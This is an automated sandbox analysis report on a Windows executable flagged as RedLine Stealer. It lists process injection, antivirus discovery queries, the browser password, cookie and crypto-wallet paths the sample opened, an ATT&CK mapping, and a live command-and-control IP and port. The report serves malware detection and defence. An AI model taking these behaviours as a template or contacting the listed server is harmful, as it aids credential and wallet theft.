Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 34E008

Jump to behavior

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

0_2_00221201

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_00202BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00202BA5

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_0022B226 SendInput,keybd_event,

0_2_0022B226

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_002422DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_002422DA

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\K3xL5Xy0XS.exe"

Jump to behavior

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

0_2_00220B62

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_00221663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00221663

Source: K3xL5Xy0XS.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: K3xL5Xy0XS.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_001E0698 cpuid

0_2_001E0698

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_00238195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00238195

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_0021D27A GetUserNameW,

0_2_0021D27A

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_001FBB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_001FBB6F

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_001C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001C42DE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: RegSvcs.exe, 00000001.00000002.1890110482.00000000069B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: K3xL5Xy0XS.exe, 00000000.00000002.1707935052.0000000001594000.00000004.00000020.00020000.00000000.sdmp, K3xL5Xy0XS.exe, 00000000.00000003.1669566555.0000000001503000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mcupdate.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.K3xL5Xy0XS.exe.2260000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.K3xL5Xy0XS.exe.2260000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: K3xL5Xy0XS.exe PID: 3808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2368, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior

Source: K3xL5Xy0XS.exe	Binary or memory string: WIN_81
Source: K3xL5Xy0XS.exe	Binary or memory string: WIN_XP
Source: K3xL5Xy0XS.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: K3xL5Xy0XS.exe	Binary or memory string: WIN_XPe
Source: K3xL5Xy0XS.exe	Binary or memory string: WIN_VISTA
Source: K3xL5Xy0XS.exe	Binary or memory string: WIN_7
Source: K3xL5Xy0XS.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 0.2.K3xL5Xy0XS.exe.2260000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.K3xL5Xy0XS.exe.2260000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: K3xL5Xy0XS.exe PID: 3808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2368, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.K3xL5Xy0XS.exe.2260000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.K3xL5Xy0XS.exe.2260000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: K3xL5Xy0XS.exe PID: 3808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2368, type: MEMORYSTR

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_00241204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_00241204
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_00241806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00241806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	227 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 Masquerading	LSA Secrets	451 Security Software Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	321 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	321 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
K3xL5Xy0XS.exe	63%	ReversingLabs	Win32.Trojan.AutoitInject
K3xL5Xy0XS.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://185.222.58.90:55615/	0%	Avira URL Cloud	safe
http://185.222.58.90:55615	0%	Avira URL Cloud	safe
https://api.ipify.orgcookies//settinString.Removeg	0%	Avira URL Cloud	safe
185.222.58.90:55615	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ip.sb	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
185.222.58.90:55615	true	Avira URL Cloud: safe	unknown
http://185.222.58.90:55615/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ipinfo.io/ip%appdata%	K3xL5Xy0XS.exe, 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.dr	false		high
https://duckduckgo.com/ac/?q=	RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.dr	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/CheckConnectResponse	RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.datacontract.org/2004/07/	RegSvcs.exe, 00000001.00000002.1883053788.00000000025DC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/EnvironmentSettings	RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	K3xL5Xy0XS.exe, 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/envelope/	RegSvcs.exe, 00000001.00000002.1883053788.0000000002500000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.dr	false		high
http://tempuri.org/	RegSvcs.exe, 00000001.00000002.1883053788.0000000002500000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/CheckConnect	RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.dr	false		high
https://www.ecosia.org/newtab/	RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.dr	false		high
http://tempuri.org/Endpoint/VerifyUpdateResponse	RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/SetEnvironment	RegSvcs.exe, 00000001.00000002.1883053788.00000000025DC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/SetEnvironmentResponse	RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/GetUpdates	RegSvcs.exe, 00000001.00000002.1883053788.00000000025DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1883053788.0000000002500000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.dr	false		high
https://api.ipify.orgcookies//settinString.Removeg	K3xL5Xy0XS.exe, 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/GetUpdatesResponse	RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.dr	false		high
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/VerifyUpdate	RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/0	RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.222.58.90:55615	RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1883053788.00000000025DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.dr	false		high
http://schemas.xmlsoap.org/soap/actor/next	RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.222.58.90	unknown	Netherlands		51447	ROOTLAYERNETNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580311
Start date and time:	2024-12-24 09:06:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
